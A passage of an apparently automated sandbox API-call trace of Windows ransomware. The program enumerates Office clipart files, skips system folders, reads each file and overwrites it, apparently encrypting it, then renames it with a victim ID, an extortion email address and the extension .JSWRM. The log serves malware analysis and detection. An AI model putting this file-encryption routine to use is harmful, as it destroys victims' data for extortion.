cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198447.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198447.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0087.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0087.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0087.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0087.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198447.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.591] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=49676) returned 1 [0087.591] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc200) returned 0x24d210 [0087.592] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xc200, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xc200, lpOverlapped=0x0) returned 1 [0087.598] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.598] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xc200, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xc200, lpOverlapped=0x0) returned 1 [0087.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.599] CloseHandle (hObject=0x314) returned 1 [0087.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0087.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0087.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0087.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0087.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0087.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0087.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.599] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198447.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198447.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0087.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0087.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0087.600] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebae9de, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebae9de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebae9de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xae08, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0198494.WMF", cAlternateFileName="")) returned 1 [0087.600] lstrcmpiW (lpString1="J0198494.WMF", lpString2=".") returned 1 [0087.600] lstrcmpiW (lpString1="J0198494.WMF", lpString2="..") returned 1 [0087.600] lstrcmpiW (lpString1="J0198494.WMF", lpString2="...") returned 1 [0087.600] lstrcmpiW (lpString1="J0198494.WMF", lpString2="windows") returned -1 [0087.600] lstrcmpiW (lpString1="J0198494.WMF", lpString2="recovery") returned -1 [0087.600] lstrcmpiW (lpString1="J0198494.WMF", lpString2="perflogs") returned -1 [0087.600] lstrcmpiW (lpString1="J0198494.WMF", lpString2="documents and settings") returned 1 [0087.600] lstrcmpiW (lpString1="J0198494.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.601] lstrcmpiW (lpString1="J0198494.WMF", lpString2="system volume information") returned -1 [0087.601] lstrcmpiW (lpString1="J0198494.WMF", lpString2="msocache") returned -1 [0087.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0087.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198494.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198494.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198494.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0087.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0087.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198494.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198494.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198494.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0087.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0087.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0087.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0087.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198494.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.601] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=44552) returned 1 [0087.601] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xae00) returned 0x24d210 [0087.602] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xae00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xae00, lpOverlapped=0x0) returned 1 [0087.607] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.607] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xae00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xae00, lpOverlapped=0x0) returned 1 [0087.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.608] CloseHandle (hObject=0x314) returned 1 [0087.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0087.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0087.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0087.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0087.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0087.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0087.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.609] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198494.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198494.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0087.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0087.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0087.610] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebae9de, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebae9de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebae9de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe17a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0198712.WMF", cAlternateFileName="")) returned 1 [0087.610] lstrcmpiW (lpString1="J0198712.WMF", lpString2=".") returned 1 [0087.610] lstrcmpiW (lpString1="J0198712.WMF", lpString2="..") returned 1 [0087.610] lstrcmpiW (lpString1="J0198712.WMF", lpString2="...") returned 1 [0087.610] lstrcmpiW (lpString1="J0198712.WMF", lpString2="windows") returned -1 [0087.610] lstrcmpiW (lpString1="J0198712.WMF", lpString2="recovery") returned -1 [0087.610] lstrcmpiW (lpString1="J0198712.WMF", lpString2="perflogs") returned -1 [0087.610] lstrcmpiW (lpString1="J0198712.WMF", lpString2="documents and settings") returned 1 [0087.610] lstrcmpiW (lpString1="J0198712.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.610] lstrcmpiW (lpString1="J0198712.WMF", lpString2="system volume information") returned -1 [0087.610] lstrcmpiW (lpString1="J0198712.WMF", lpString2="msocache") returned -1 [0087.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0087.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198712.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198712.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198712.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0087.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0087.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198712.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198712.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198712.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0087.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0087.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0087.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0087.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198712.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.611] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=57722) returned 1 [0087.611] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe170) returned 0x24d210 [0087.612] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xe170, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xe170, lpOverlapped=0x0) returned 1 [0087.617] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.617] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xe170, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xe170, lpOverlapped=0x0) returned 1 [0087.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.618] CloseHandle (hObject=0x314) returned 1 [0087.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0087.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0087.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0087.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0087.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0087.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0087.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.619] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198712.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198712.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0087.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0087.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0087.620] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebd4c33, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebd4c33, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebd4c33, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x714e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0199279.WMF", cAlternateFileName="")) returned 1 [0087.620] lstrcmpiW (lpString1="J0199279.WMF", lpString2=".") returned 1 [0087.620] lstrcmpiW (lpString1="J0199279.WMF", lpString2="..") returned 1 [0087.620] lstrcmpiW (lpString1="J0199279.WMF", lpString2="...") returned 1 [0087.620] lstrcmpiW (lpString1="J0199279.WMF", lpString2="windows") returned -1 [0087.620] lstrcmpiW (lpString1="J0199279.WMF", lpString2="recovery") returned -1 [0087.620] lstrcmpiW (lpString1="J0199279.WMF", lpString2="perflogs") returned -1 [0087.620] lstrcmpiW (lpString1="J0199279.WMF", lpString2="documents and settings") returned 1 [0087.620] lstrcmpiW (lpString1="J0199279.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.620] lstrcmpiW (lpString1="J0199279.WMF", lpString2="system volume information") returned -1 [0087.620] lstrcmpiW (lpString1="J0199279.WMF", lpString2="msocache") returned -1 [0087.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0087.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199279.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199279.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199279.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0087.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0087.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199279.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199279.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199279.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0087.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0087.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0087.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0087.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199279.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.672] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=29006) returned 1 [0087.672] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7140) returned 0x24d210 [0087.672] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7140, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 